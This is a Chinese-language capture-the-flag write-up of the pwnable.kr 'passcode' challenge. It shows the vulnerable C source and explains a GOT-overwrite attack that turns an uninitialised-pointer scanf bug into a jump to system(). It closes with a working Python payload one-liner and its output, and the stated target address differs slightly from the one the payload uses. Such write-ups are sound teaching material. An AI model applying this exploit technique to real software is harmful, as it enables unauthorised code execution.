pwnable.kr [Toddler's Bottle] - passcode

Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?

ssh [email protected] -p2222 (pw:guest)

说来惭愧,这题在刚接触的时候因为对 Linux 编程的不了解,试了很多办法都没有头绪,所以拖到了现在。
其实原理很简单,就是简单的 GOT 溢出攻击。
关于 GOT 相关可以移步笔者另一篇转载的文章,有关于 PLT , GOT 的简单介绍:
http://blog.csdn.net/qq_19550513/article/details/66535524

这里先放上题目源码:

#include 
#include 

void login(){
    int passcode1;
    int passcode2;

    printf("enter passcode1 : ");
    scanf("%d", passcode1);
    fflush(stdin);

    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
    printf("enter passcode2 : ");
        scanf("%d", passcode2);

    printf("checking...\n");
    if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
        exit(0);
        }
}

void welcome(){
    char name[100];
    printf("enter you name : ");
    scanf("%100s", name);
    printf("Welcome %s!\n", name);
}

int main(){
    printf("Toddler's Secure Login System 1.0 beta.\n");

    welcome();
    login();

    // something after login...
    printf("Now I can safely trust you that you have credential :)\n");
    return 0;   
}


可以看到在 login 函数中调用的 scanf("%d", passcode1); 在 passcode1 前没有加取地址符号 &,而由于 passcode 1没有初始化,导致这个输入操作会将数据写入 栈中 passcode1 未被初始化时存放的数据指向的地址。在实际执行到这里时如果对 passcode1 输入了正确格式的十进制整数,便会报错。

用 gdb 调试,分别在 welcome 和 login 函数处下断。
在 welcome 函数调用 scanf 处先输入 100 个 ‘a’ 方便观察栈中情况,如下:


pwnable.kr [Toddler's Bottle] - passcode_第1张图片

continue , 执行到 passcode1 的 scanf 前中断,查看此时栈中情况:


pwnable.kr [Toddler's Bottle] - passcode_第2张图片

可以看到,welcome 函数中输入的最后 4 字节占据了此时局部变量 passcode1 在栈中的位置。所以在执行 scanf("%d", passcode1); 时会像这里指向的不存在的 0x61616161 处写内容,故而报错。

造成这个问题的原因有两点:

  • 在 welcome 函数返回后这里进行了堆栈平衡,然而没有清空栈中的内容,login 函数和 welcome 函数又相当于是共享了同一个栈区域;
  • passcode1 没有初始化,导致passcode1 在栈中单元里存放的仍是之前栈帧遗留下来的内容。

我们可以利用被湮没的这 4 个字节,利用 scanf 函数去到指定的位置写内容。这题的目的是绕过对 passcode 的验证,这里可以覆写 GOT 来控制程序流程。

即原理是,welcome 中 scanf 函数被调用 --> 
输入构造好的字符串,其中最后 4 字节为要覆写的保存有目标函数指令地址的内存单元在 GOT 中的地址 --> 
login 中的 scanf函数被调用 --> 
覆写该位置,即目标函数指令地址被改写,执行该函数时会去到改写后的位置执行。

通过 gdb 查看 login 中之后调用的函数位置(这里无非是 fflush , printf , 和 exit),任选其一即可,这里笔者选择的是printf。

接下来查找 system 调用指令的位置和和 printf 在 GOT 中的地址(因为编译环境可能和服务器不同,为了准确性,到 ssh 登入去找相关位置)

直接 passcode@ubuntu:~$ objdump -d passcode

找到相关地址如下:


pwnable.kr [Toddler's Bottle] - passcode_第3张图片
pwnable.kr [Toddler's Bottle] - passcode_第4张图片

即控制流程指向的 call system 位于 0x080485ea,printf 在 GOT 中地址为 0x0804a000 ,
构造如下输入后得到 falg:

passcode@ubuntu:~$ python -c 'print "a"*96 + "\x00\xa0\x04\x08" + "134514147\n"' | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
Sorry mom.. I got confused about scanf usage :(
enter passcode1 : Now I can safely trust you that you have credential :)

你可能感兴趣的:(pwnable.kr [Toddler's Bottle] - passcode)